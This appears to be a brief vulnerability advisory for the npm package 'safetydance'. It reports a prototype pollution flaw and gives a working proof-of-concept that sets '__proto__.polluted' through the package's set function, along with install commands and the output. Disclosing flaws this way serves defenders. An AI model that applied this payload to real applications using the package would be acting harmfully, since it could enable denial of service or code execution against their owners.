safetydance
is vulnerable to Prototype Pollution
.
This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.
// poc.js
const safetydance = require('safetydance');
var obj = {}
console.log("Before : " + obj.polluted);
safetydance.set(obj,'__proto__.polluted','Yes! Its Polluted');
var obj1 ={}
console.log("After : " + obj1.polluted);
npm i safetydance # Install affected module
node poc.js # Run the PoC
Before : undefined
After : Yes! Its Polluted